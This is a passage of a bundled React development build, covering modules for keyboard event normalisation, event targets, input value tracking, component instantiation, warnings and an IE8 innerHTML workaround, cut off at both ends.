forEachAccumulated;\n},{}],111:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\n/**\n * `charCode` represents the actual \"character code\" and is safe to use with\n * `String.fromCharCode`. As such, only keys that correspond to printable\n * characters produce a valid `charCode`, the only exception to this is Enter.\n * The Tab-key is considered non-printable and does not have a `charCode`,\n * presumably because it does not produce a tab-character in browsers.\n *\n * @param {object} nativeEvent Native browser event.\n * @return {number} Normalized `charCode` property.\n */\n\nfunction getEventCharCode(nativeEvent) {\n  var charCode;\n  var keyCode = nativeEvent.keyCode;\n\n  if ('charCode' in nativeEvent) {\n    charCode = nativeEvent.charCode;\n\n    // FF does not set `charCode` for the Enter-key, check against `keyCode`.\n    if (charCode === 0 && keyCode === 13) {\n      charCode = 13;\n    }\n  } else {\n    // IE8 does not implement `charCode`, but `keyCode` has the correct value.\n    charCode = keyCode;\n  }\n\n  // Some non-printable keys are reported in `charCode`/`keyCode`, discard them.\n  // Must not discard the (non-)printable Enter-key.\n  if (charCode >= 32 || charCode === 13) {\n    return charCode;\n  }\n\n  return 0;\n}\n\nmodule.exports = getEventCharCode;\n},{}],112:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar getEventCharCode = _dereq_(111);\n\n/**\n * Normalization of deprecated HTML5 `key` values\n * @see https://developer.mozilla.org/en-US/docs/Web/API/KeyboardEvent#Key_names\n */\nvar normalizeKey = {\n  Esc: 'Escape',\n  Spacebar: ' ',\n  Left: 'ArrowLeft',\n  Up: 'ArrowUp',\n  Right: 'ArrowRight',\n  Down: 'ArrowDown',\n  Del: 'Delete',\n  Win: 'OS',\n  Menu: 'ContextMenu',\n  Apps: 'ContextMenu',\n  Scroll: 'ScrollLock',\n  MozPrintableKey: 'Unidentified'\n};\n\n/**\n * Translation from legacy `keyCode` to HTML5 `key`\n * Only special keys supported, all others depend on keyboard layout or browser\n * @see https://developer.mozilla.org/en-US/docs/Web/API/KeyboardEvent#Key_names\n */\nvar translateToKey = {\n  8: 'Backspace',\n  9: 'Tab',\n  12: 'Clear',\n  13: 'Enter',\n  16: 'Shift',\n  17: 'Control',\n  18: 'Alt',\n  19: 'Pause',\n  20: 'CapsLock',\n  27: 'Escape',\n  32: ' ',\n  33: 'PageUp',\n  34: 'PageDown',\n  35: 'End',\n  36: 'Home',\n  37: 'ArrowLeft',\n  38: 'ArrowUp',\n  39: 'ArrowRight',\n  40: 'ArrowDown',\n  45: 'Insert',\n  46: 'Delete',\n  112: 'F1',\n  113: 'F2',\n  114: 'F3',\n  115: 'F4',\n  116: 'F5',\n  117: 'F6',\n  118: 'F7',\n  119: 'F8',\n  120: 'F9',\n  121: 'F10',\n  122: 'F11',\n  123: 'F12',\n  144: 'NumLock',\n  145: 'ScrollLock',\n  224: 'Meta'\n};\n\n/**\n * @param {object} nativeEvent Native browser event.\n * @return {string} Normalized `key` property.\n */\nfunction getEventKey(nativeEvent) {\n  if (nativeEvent.key) {\n    // Normalize inconsistent values reported by browsers due to\n    // implementations of a working draft specification.\n\n    // FireFox implements `key` but returns `MozPrintableKey` for all\n    // printable characters (normalized to `Unidentified`), ignore it.\n    var key = normalizeKey[nativeEvent.key] || nativeEvent.key;\n    if (key !== 'Unidentified') {\n      return key;\n    }\n  }\n\n  // Browser does not implement `key`, polyfill as much of it as we can.\n  if (nativeEvent.type === 'keypress') {\n    var charCode = getEventCharCode(nativeEvent);\n\n    // The enter-key is technically both printable and non-printable and can\n    // thus be captured by `keypress`, no other non-printable key should.\n    return charCode === 13 ? 'Enter' : String.fromCharCode(charCode);\n  }\n  if (nativeEvent.type === 'keydown' || nativeEvent.type === 'keyup') {\n    // While user keyboard layout determines the actual meaning of each\n    // `keyCode` value, almost all function keys have a universal value.\n    return translateToKey[nativeEvent.keyCode] || 'Unidentified';\n  }\n  return '';\n}\n\nmodule.exports = getEventKey;\n},{\"111\":111}],113:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\n/**\n * Translation from modifier key to the associated property in the event.\n * @see http://www.w3.org/TR/DOM-Level-3-Events/#keys-Modifiers\n */\n\nvar modifierKeyToProp = {\n  Alt: 'altKey',\n  Control: 'ctrlKey',\n  Meta: 'metaKey',\n  Shift: 'shiftKey'\n};\n\n// IE8 does not implement getModifierState so we simply map it to the only\n// modifier keys exposed by the event itself, does not support Lock-keys.\n// Currently, all major browsers except Chrome seems to support Lock-keys.\nfunction modifierStateGetter(keyArg) {\n  var syntheticEvent = this;\n  var nativeEvent = syntheticEvent.nativeEvent;\n  if (nativeEvent.getModifierState) {\n    return nativeEvent.getModifierState(keyArg);\n  }\n  var keyProp = modifierKeyToProp[keyArg];\n  return keyProp ? !!nativeEvent[keyProp] : false;\n}\n\nfunction getEventModifierState(nativeEvent) {\n  return modifierStateGetter;\n}\n\nmodule.exports = getEventModifierState;\n},{}],114:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\n/**\n * Gets the target node from a native browser event by accounting for\n * inconsistencies in browser DOM APIs.\n *\n * @param {object} nativeEvent Native browser event.\n * @return {DOMEventTarget} Target node.\n */\n\nfunction getEventTarget(nativeEvent) {\n  var target = nativeEvent.target || nativeEvent.srcElement || window;\n\n  // Normalize SVG <use> element events #4963\n  if (target.correspondingUseElement) {\n    target = target.correspondingUseElement;\n  }\n\n  // Safari may fire events on text nodes (Node.TEXT_NODE is 3).\n  // @see http://www.quirksmode.org/js/events_properties.html\n  return target.nodeType === 3 ? target.parentNode : target;\n}\n\nmodule.exports = getEventTarget;\n},{}],115:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar ReactNodeTypes = _dereq_(69);\n\nfunction getHostComponentFromComposite(inst) {\n  var type;\n\n  while ((type = inst._renderedNodeType) === ReactNodeTypes.COMPOSITE) {\n    inst = inst._renderedComponent;\n  }\n\n  if (type === ReactNodeTypes.HOST) {\n    return inst._renderedComponent;\n  } else if (type === ReactNodeTypes.EMPTY) {\n    return null;\n  }\n}\n\nmodule.exports = getHostComponentFromComposite;\n},{\"69\":69}],116:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\n/* global Symbol */\n\nvar ITERATOR_SYMBOL = typeof Symbol === 'function' && Symbol.iterator;\nvar FAUX_ITERATOR_SYMBOL = '@@iterator'; // Before Symbol spec.\n\n/**\n * Returns the iterator method function contained on the iterable object.\n *\n * Be sure to invoke the function with the iterable as context:\n *\n *     var iteratorFn = getIteratorFn(myIterable);\n *     if (iteratorFn) {\n *       var iterator = iteratorFn.call(myIterable);\n *       ...\n *     }\n *\n * @param {?object} maybeIterable\n * @return {?function}\n */\nfunction getIteratorFn(maybeIterable) {\n  var iteratorFn = maybeIterable && (ITERATOR_SYMBOL && maybeIterable[ITERATOR_SYMBOL] || maybeIterable[FAUX_ITERATOR_SYMBOL]);\n  if (typeof iteratorFn === 'function') {\n    return iteratorFn;\n  }\n}\n\nmodule.exports = getIteratorFn;\n},{}],117:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\n/**\n * Given any node return the first leaf node without children.\n *\n * @param {DOMElement|DOMTextNode} node\n * @return {DOMElement|DOMTextNode}\n */\n\nfunction getLeafNode(node) {\n  while (node && node.firstChild) {\n    node = node.firstChild;\n  }\n  return node;\n}\n\n/**\n * Get the next sibling within a container. This will walk up the\n * DOM if a node's siblings have been exhausted.\n *\n * @param {DOMElement|DOMTextNode} node\n * @return {?DOMElement|DOMTextNode}\n */\nfunction getSiblingNode(node) {\n  while (node) {\n    if (node.nextSibling) {\n      return node.nextSibling;\n    }\n    node = node.parentNode;\n  }\n}\n\n/**\n * Get object describing the nodes which contain characters at offset.\n *\n * @param {DOMElement|DOMTextNode} root\n * @param {number} offset\n * @return {?object}\n */\nfunction getNodeForCharacterOffset(root, offset) {\n  var node = getLeafNode(root);\n  var nodeStart = 0;\n  var nodeEnd = 0;\n\n  while (node) {\n    if (node.nodeType === 3) {\n      nodeEnd = nodeStart + node.textContent.length;\n\n      if (nodeStart <= offset && nodeEnd >= offset) {\n        return {\n          node: node,\n          offset: offset - nodeStart\n        };\n      }\n\n      nodeStart = nodeEnd;\n    }\n\n    node = getLeafNode(getSiblingNode(node));\n  }\n}\n\nmodule.exports = getNodeForCharacterOffset;\n},{}],118:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar ExecutionEnvironment = _dereq_(138);\n\nvar contentKey = null;\n\n/**\n * Gets the key used to access text content on a DOM node.\n *\n * @return {?string} Key used to access text content.\n * @internal\n */\nfunction getTextContentAccessor() {\n  if (!contentKey && ExecutionEnvironment.canUseDOM) {\n    // Prefer textContent to innerText because many browsers support both but\n    // SVG <text> elements don't support innerText even when <div> does.\n    contentKey = 'textContent' in document.documentElement ? 'textContent' : 'innerText';\n  }\n  return contentKey;\n}\n\nmodule.exports = getTextContentAccessor;\n},{\"138\":138}],119:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar ExecutionEnvironment = _dereq_(138);\n\n/**\n * Generate a mapping of standard vendor prefixes using the defined style property and event name.\n *\n * @param {string} styleProp\n * @param {string} eventName\n * @returns {object}\n */\nfunction makePrefixMap(styleProp, eventName) {\n  var prefixes = {};\n\n  prefixes[styleProp.toLowerCase()] = eventName.toLowerCase();\n  prefixes['Webkit' + styleProp] = 'webkit' + eventName;\n  prefixes['Moz' + styleProp] = 'moz' + eventName;\n  prefixes['ms' + styleProp] = 'MS' + eventName;\n  prefixes['O' + styleProp] = 'o' + eventName.toLowerCase();\n\n  return prefixes;\n}\n\n/**\n * A list of event names to a configurable list of vendor prefixes.\n */\nvar vendorPrefixes = {\n  animationend: makePrefixMap('Animation', 'AnimationEnd'),\n  animationiteration: makePrefixMap('Animation', 'AnimationIteration'),\n  animationstart: makePrefixMap('Animation', 'AnimationStart'),\n  transitionend: makePrefixMap('Transition', 'TransitionEnd')\n};\n\n/**\n * Event names that have already been detected and prefixed (if applicable).\n */\nvar prefixedEventNames = {};\n\n/**\n * Element to check for prefixes on.\n */\nvar style = {};\n\n/**\n * Bootstrap if a DOM exists.\n */\nif (ExecutionEnvironment.canUseDOM) {\n  style = document.createElement('div').style;\n\n  // On some platforms, in particular some releases of Android 4.x,\n  // the un-prefixed \"animation\" and \"transition\" properties are defined on the\n  // style object but the events that fire will still be prefixed, so we need\n  // to check if the un-prefixed events are usable, and if not remove them from the map.\n  if (!('AnimationEvent' in window)) {\n    delete vendorPrefixes.animationend.animation;\n    delete vendorPrefixes.animationiteration.animation;\n    delete vendorPrefixes.animationstart.animation;\n  }\n\n  // Same as above\n  if (!('TransitionEvent' in window)) {\n    delete vendorPrefixes.transitionend.transition;\n  }\n}\n\n/**\n * Attempts to determine the correct vendor prefixed event name.\n *\n * @param {string} eventName\n * @returns {string}\n */\nfunction getVendorPrefixedEventName(eventName) {\n  if (prefixedEventNames[eventName]) {\n    return prefixedEventNames[eventName];\n  } else if (!vendorPrefixes[eventName]) {\n    return eventName;\n  }\n\n  var prefixMap = vendorPrefixes[eventName];\n\n  for (var styleProp in prefixMap) {\n    if (prefixMap.hasOwnProperty(styleProp) && styleProp in style) {\n      return prefixedEventNames[eventName] = prefixMap[styleProp];\n    }\n  }\n\n  return '';\n}\n\nmodule.exports = getVendorPrefixedEventName;\n},{\"138\":138}],120:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar ReactDOMComponentTree = _dereq_(34);\n\nfunction isCheckable(elem) {\n  var type = elem.type;\n  var nodeName = elem.nodeName;\n  return nodeName && nodeName.toLowerCase() === 'input' && (type === 'checkbox' || type === 'radio');\n}\n\nfunction getTracker(inst) {\n  return inst._wrapperState.valueTracker;\n}\n\nfunction attachTracker(inst, tracker) {\n  inst._wrapperState.valueTracker = tracker;\n}\n\nfunction detachTracker(inst) {\n  delete inst._wrapperState.valueTracker;\n}\n\nfunction getValueFromNode(node) {\n  var value;\n  if (node) {\n    value = isCheckable(node) ? '' + node.checked : node.value;\n  }\n  return value;\n}\n\nvar inputValueTracking = {\n  // exposed for testing\n  _getTrackerFromNode: function (node) {\n    return getTracker(ReactDOMComponentTree.getInstanceFromNode(node));\n  },\n\n\n  track: function (inst) {\n    if (getTracker(inst)) {\n      return;\n    }\n\n    var node = ReactDOMComponentTree.getNodeFromInstance(inst);\n    var valueField = isCheckable(node) ? 'checked' : 'value';\n    var descriptor = Object.getOwnPropertyDescriptor(node.constructor.prototype, valueField);\n\n    var currentValue = '' + node[valueField];\n\n    // if someone has already defined a value or Safari, then bail\n    // and don't track value will cause over reporting of changes,\n    // but it's better then a hard failure\n    // (needed for certain tests that spyOn input values and Safari)\n    if (node.hasOwnProperty(valueField) || typeof descriptor.get !== 'function' || typeof descriptor.set !== 'function') {\n      return;\n    }\n\n    Object.defineProperty(node, valueField, {\n      enumerable: descriptor.enumerable,\n      configurable: true,\n      get: function () {\n        return descriptor.get.call(this);\n      },\n      set: function (value) {\n        currentValue = '' + value;\n        descriptor.set.call(this, value);\n      }\n    });\n\n    attachTracker(inst, {\n      getValue: function () {\n        return currentValue;\n      },\n      setValue: function (value) {\n        currentValue = '' + value;\n      },\n      stopTracking: function () {\n        detachTracker(inst);\n        delete node[valueField];\n      }\n    });\n  },\n\n  updateValueIfChanged: function (inst) {\n    if (!inst) {\n      return false;\n    }\n    var tracker = getTracker(inst);\n\n    if (!tracker) {\n      inputValueTracking.track(inst);\n      return true;\n    }\n\n    var lastValue = tracker.getValue();\n    var nextValue = getValueFromNode(ReactDOMComponentTree.getNodeFromInstance(inst));\n\n    if (nextValue !== lastValue) {\n      tracker.setValue(nextValue);\n      return true;\n    }\n\n    return false;\n  },\n  stopTracking: function (inst) {\n    var tracker = getTracker(inst);\n    if (tracker) {\n      tracker.stopTracking();\n    }\n  }\n};\n\nmodule.exports = inputValueTracking;\n},{\"34\":34}],121:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126),\n    _assign = _dereq_(160);\n\nvar ReactCompositeComponent = _dereq_(30);\nvar ReactEmptyComponent = _dereq_(54);\nvar ReactHostComponent = _dereq_(59);\n\nvar getNextDebugID = _dereq_(136);\nvar invariant = _dereq_(152);\nvar warning = _dereq_(159);\n\n// To avoid a cyclic dependency, we create the final class in this module\nvar ReactCompositeComponentWrapper = function (element) {\n  this.construct(element);\n};\n\nfunction getDeclarationErrorAddendum(owner) {\n  if (owner) {\n    var name = owner.getName();\n    if (name) {\n      return ' Check the render method of `' + name + '`.';\n    }\n  }\n  return '';\n}\n\n/**\n * Check if the type reference is a known internal type. I.e. not a user\n * provided composite type.\n *\n * @param {function} type\n * @return {boolean} Returns true if this is a valid internal type.\n */\nfunction isInternalComponentType(type) {\n  return typeof type === 'function' && typeof type.prototype !== 'undefined' && typeof type.prototype.mountComponent === 'function' && typeof type.prototype.receiveComponent === 'function';\n}\n\n/**\n * Given a ReactNode, create an instance that will actually be mounted.\n *\n * @param {ReactNode} node\n * @param {boolean} shouldHaveDebugID\n * @return {object} A new instance of the element's constructor.\n * @protected\n */\nfunction instantiateReactComponent(node, shouldHaveDebugID) {\n  var instance;\n\n  if (node === null || node === false) {\n    instance = ReactEmptyComponent.create(instantiateReactComponent);\n  } else if (typeof node === 'object') {\n    var element = node;\n    var type = element.type;\n    if (typeof type !== 'function' && typeof type !== 'string') {\n      var info = '';\n      if (\"development\" !== 'production') {\n        if (type === undefined || typeof type === 'object' && type !== null && Object.keys(type).length === 0) {\n          info += ' You likely forgot to export your component from the file ' + \"it's defined in.\";\n        }\n      }\n      info += getDeclarationErrorAddendum(element._owner);\n      !false ? \"development\" !== 'production' ? invariant(false, 'Element type is invalid: expected a string (for built-in components) or a class/function (for composite components) but got: %s.%s', type == null ? type : typeof type, info) : _prodInvariant('130', type == null ? type : typeof type, info) : void 0;\n    }\n\n    // Special case string values\n    if (typeof element.type === 'string') {\n      instance = ReactHostComponent.createInternalComponent(element);\n    } else if (isInternalComponentType(element.type)) {\n      // This is temporarily available for custom components that are not string\n      // representations. I.e. ART. Once those are updated to use the string\n      // representation, we can drop this code path.\n      instance = new element.type(element);\n\n      // We renamed this. Allow the old name for compat. :(\n      if (!instance.getHostNode) {\n        instance.getHostNode = instance.getNativeNode;\n      }\n    } else {\n      instance = new ReactCompositeComponentWrapper(element);\n    }\n  } else if (typeof node === 'string' || typeof node === 'number') {\n    instance = ReactHostComponent.createInstanceForText(node);\n  } else {\n    !false ? \"development\" !== 'production' ? invariant(false, 'Encountered invalid React node of type %s', typeof node) : _prodInvariant('131', typeof node) : void 0;\n  }\n\n  if (\"development\" !== 'production') {\n    \"development\" !== 'production' ? warning(typeof instance.mountComponent === 'function' && typeof instance.receiveComponent === 'function' && typeof instance.getHostNode === 'function' && typeof instance.unmountComponent === 'function', 'Only React Components can be mounted.') : void 0;\n  }\n\n  // These two fields are used by the DOM and ART diffing algorithms\n  // respectively. Instead of using expandos on components, we should be\n  // storing the state needed by the diffing algorithms elsewhere.\n  instance._mountIndex = 0;\n  instance._mountImage = null;\n\n  if (\"development\" !== 'production') {\n    instance._debugID = shouldHaveDebugID ? getNextDebugID() : 0;\n  }\n\n  // Internal instances should fully constructed at this point, so they should\n  // not get any new fields added to them at this point.\n  if (\"development\" !== 'production') {\n    if (Object.preventExtensions) {\n      Object.preventExtensions(instance);\n    }\n  }\n\n  return instance;\n}\n\n_assign(ReactCompositeComponentWrapper.prototype, ReactCompositeComponent, {\n  _instantiateReactComponent: instantiateReactComponent\n});\n\nmodule.exports = instantiateReactComponent;\n},{\"126\":126,\"136\":136,\"152\":152,\"159\":159,\"160\":160,\"30\":30,\"54\":54,\"59\":59}],122:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar ExecutionEnvironment = _dereq_(138);\n\nvar useHasFeature;\nif (ExecutionEnvironment.canUseDOM) {\n  useHasFeature = document.implementation && document.implementation.hasFeature &&\n  // always returns true in newer browsers as per the standard.\n  // @see http://dom.spec.whatwg.org/#dom-domimplementation-hasfeature\n  document.implementation.hasFeature('', '') !== true;\n}\n\n/**\n * Checks if an event is supported in the current execution environment.\n *\n * NOTE: This will not work correctly for non-generic events such as `change`,\n * `reset`, `load`, `error`, and `select`.\n *\n * Borrows from Modernizr.\n *\n * @param {string} eventNameSuffix Event name, e.g. \"click\".\n * @param {?boolean} capture Check if the capture phase is supported.\n * @return {boolean} True if the event is supported.\n * @internal\n * @license Modernizr 3.0.0pre (Custom Build) | MIT\n */\nfunction isEventSupported(eventNameSuffix, capture) {\n  if (!ExecutionEnvironment.canUseDOM || capture && !('addEventListener' in document)) {\n    return false;\n  }\n\n  var eventName = 'on' + eventNameSuffix;\n  var isSupported = eventName in document;\n\n  if (!isSupported) {\n    var element = document.createElement('div');\n    element.setAttribute(eventName, 'return;');\n    isSupported = typeof element[eventName] === 'function';\n  }\n\n  if (!isSupported && useHasFeature && eventNameSuffix === 'wheel') {\n    // This is the only way to test support for the `wheel` event in IE9+.\n    isSupported = document.implementation.hasFeature('Events.wheel', '3.0');\n  }\n\n  return isSupported;\n}\n\nmodule.exports = isEventSupported;\n},{\"138\":138}],123:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\n/**\n * @see http://www.whatwg.org/specs/web-apps/current-work/multipage/the-input-element.html#input-type-attr-summary\n */\n\nvar supportedInputTypes = {\n  color: true,\n  date: true,\n  datetime: true,\n  'datetime-local': true,\n  email: true,\n  month: true,\n  number: true,\n  password: true,\n  range: true,\n  search: true,\n  tel: true,\n  text: true,\n  time: true,\n  url: true,\n  week: true\n};\n\nfunction isTextInputElement(elem) {\n  var nodeName = elem && elem.nodeName && elem.nodeName.toLowerCase();\n\n  if (nodeName === 'input') {\n    return !!supportedInputTypes[elem.type];\n  }\n\n  if (nodeName === 'textarea') {\n    return true;\n  }\n\n  return false;\n}\n\nmodule.exports = isTextInputElement;\n},{}],124:[function(_dereq_,module,exports){\n/**\n * Copyright 2014-2015, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\n/**\n * Forked from fbjs/warning:\n * https://github.com/facebook/fbjs/blob/e66ba20ad5be433eb54423f2b097d829324d9de6/packages/fbjs/src/__forks__/warning.js\n *\n * Only change is we use console.warn instead of console.error,\n * and do nothing when 'console' is not supported.\n * This really simplifies the code.\n * ---\n * Similar to invariant but only logs a warning if the condition is not met.\n * This can be used to log issues in development environments in critical\n * paths. Removing the logging code for production environments will keep the\n * same logic and follow the same code paths.\n */\n\nvar lowPriorityWarning = function () {};\n\nif (\"development\" !== 'production') {\n  var printWarning = function (format) {\n    for (var _len = arguments.length, args = Array(_len > 1 ? _len - 1 : 0), _key = 1; _key < _len; _key++) {\n      args[_key - 1] = arguments[_key];\n    }\n\n    var argIndex = 0;\n    var message = 'Warning: ' + format.replace(/%s/g, function () {\n      return args[argIndex++];\n    });\n    if (typeof console !== 'undefined') {\n      console.warn(message);\n    }\n    try {\n      // --- Welcome to debugging React ---\n      // This error was thrown as a convenience so that you can use this stack\n      // to find the callsite that caused this warning to fire.\n      throw new Error(message);\n    } catch (x) {}\n  };\n\n  lowPriorityWarning = function (condition, format) {\n    if (format === undefined) {\n      throw new Error('`warning(condition, format, ...args)` requires a warning ' + 'message argument');\n    }\n    if (!condition) {\n      for (var _len2 = arguments.length, args = Array(_len2 > 2 ? _len2 - 2 : 0), _key2 = 2; _key2 < _len2; _key2++) {\n        args[_key2 - 2] = arguments[_key2];\n      }\n\n      printWarning.apply(undefined, [format].concat(args));\n    }\n  };\n}\n\nmodule.exports = lowPriorityWarning;\n},{}],125:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar escapeTextContentForBrowser = _dereq_(107);\n\n/**\n * Escapes attribute value to prevent scripting attacks.\n *\n * @param {*} value Value to escape.\n * @return {string} An escaped string.\n */\nfunction quoteAttributeValueForBrowser(value) {\n  return '\"' + escapeTextContentForBrowser(value) + '\"';\n}\n\nmodule.exports = quoteAttributeValueForBrowser;\n},{\"107\":107}],126:[function(_dereq_,module,exports){\n/**\n * Copyright (c) 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n'use strict';\n\n/**\n * WARNING: DO NOT manually require this module.\n * This is a replacement for `invariant(...)` used by the error code system\n * and will _only_ be required by the corresponding babel pass.\n * It always throws.\n */\n\nfunction reactProdInvariant(code) {\n  var argCount = arguments.length - 1;\n\n  var message = 'Minified React error #' + code + '; visit ' + 'http://facebook.github.io/react/docs/error-decoder.html?invariant=' + code;\n\n  for (var argIdx = 0; argIdx < argCount; argIdx++) {\n    message += '&args[]=' + encodeURIComponent(arguments[argIdx + 1]);\n  }\n\n  message += ' for the full message or use the non-minified dev environment' + ' for full errors and additional helpful warnings.';\n\n  var error = new Error(message);\n  error.name = 'Invariant Violation';\n  error.framesToPop = 1; // we don't care about reactProdInvariant's own frame\n\n  throw error;\n}\n\nmodule.exports = reactProdInvariant;\n},{}],127:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar ReactMount = _dereq_(67);\n\nmodule.exports = ReactMount.renderSubtreeIntoContainer;\n},{\"67\":67}],128:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar ExecutionEnvironment = _dereq_(138);\nvar DOMNamespaces = _dereq_(10);\n\nvar WHITESPACE_TEST = /^[ \\r\\n\\t\\f]/;\nvar NONVISIBLE_TEST = /<(!--|link|noscript|meta|script|style)[ \\r\\n\\t\\f\\/>]/;\n\nvar createMicrosoftUnsafeLocalFunction = _dereq_(105);\n\n// SVG temp container for IE lacking innerHTML\nvar reusableSVGContainer;\n\n/**\n * Set the innerHTML property of a node, ensuring that whitespace is preserved\n * even in IE8.\n *\n * @param {DOMElement} node\n * @param {string} html\n * @internal\n */\nvar setInnerHTML = createMicrosoftUnsafeLocalFunction(function (node, html) {\n  // IE does not have innerHTML for SVG nodes, so instead we inject the\n  // new markup in a temp node and then move the child nodes across into\n  // the target node\n  if (node.namespaceURI === DOMNamespaces.svg && !('innerHTML' in node)) {\n    reusableSVGContainer = reusableSVGContainer || document.createElement('div');\n    reusableSVGContainer.innerHTML = '<svg>' + html + '</svg>';\n    var svgNode = reusableSVGContainer.firstChild;\n    while (svgNode.firstChild) {\n      node.appendChild(svgNode.firstChild);\n    }\n  } else {\n    node.innerHTML = html;\n  }\n});\n\nif (ExecutionEnvironment.canUseDOM) {\n  // IE8: When updating a just created node with innerHTML only leading\n  // whitespace is removed. When updating an existing node with innerHTML\n  // whitespace in root TextNodes is also collapsed.\n  // @see quirksmode.org/bugreports/archives/2004/11/innerhtml_and_t.html\n\n  // Feature detection; only IE8 is known to behave improperly like this.\n  var testElement = document.createElement('div');\n  testElement.innerHTML = ' ';\n  if (testElement.innerHTML === '') {\n    setInnerHTML = function (node, html) {\n      // Magic theory: IE8 supposedly differentiates between added and updated\n      // nodes when processing innerHTML, innerHTML on updated nodes suffers\n      // from worse whitespace behavior. Re-adding a node like this triggers\n      // the initial and more favorable whitespace behavior.\n      // TODO: What to do on a detached node?\n      if (node.parentNode) {\n        node.parentNode.replaceChild(node, node);\n      }\n\n      // We also implement a workaround for non-visible tags disappearing into\n      // thin air on IE8, this only happens if there is no visible text\n      // in-front of the non-visible tags. Piggyback on the whitespace fix\n      // and simply check if any non-visible tags appear in the source.\n      if (WHITESPACE_TEST.test(html) || html[0] === '<' && NONVISIBLE_TEST.test(html)) {\n        // Recover leading whitespace by temporarily prepending any character.\n        // \\uFEFF has the potential advantage of being zero-width/invisible.\n        // UglifyJS drops U+FEFF chars when parsing, so use String.fromCharCode\n        // in hopes that this is preserved even if \"\\uFEFF\" is transformed to\n        // the actual Unicode character (by Babel, for example).\n        // https://github.com/mishoo/UglifyJS2/blob/v2.4.20/lib/parse.js#L216\n        node.innerHTML = String.fromCharCode(0xfeff) + html;\n\n        // deleteData leaves an empty `TextNode` which offsets the index of all\n        // children. Definitely want to avoid this.\n        var textNode = node.firstChild;\n        if (textNode.data.length === 1) {\n          node.removeChild(textNode);\n        } else {\n          textNode.deleteData(0, 1);\n        }\n      } else {\n 